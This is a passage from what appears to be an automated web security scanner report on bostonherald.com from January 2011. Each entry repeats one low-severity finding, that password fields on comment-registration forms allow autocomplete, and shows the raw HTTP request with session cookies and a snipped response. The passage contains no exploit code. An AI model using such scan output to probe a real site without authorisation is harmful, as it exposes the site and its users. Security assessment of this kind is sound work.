Path:   /business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:10:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 99426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.4. http://www.bostonherald.com/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:09:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 68296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.5. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:06:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 77322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.6. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:03:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 58499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.7. http://www.bostonherald.com/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:41:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 98783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.8. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:22:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 93065

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.9. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:21:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 93057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.10. http://www.bostonherald.com/news/regional/view.bg

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view.bg

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:38:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.11. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.12. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.13. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
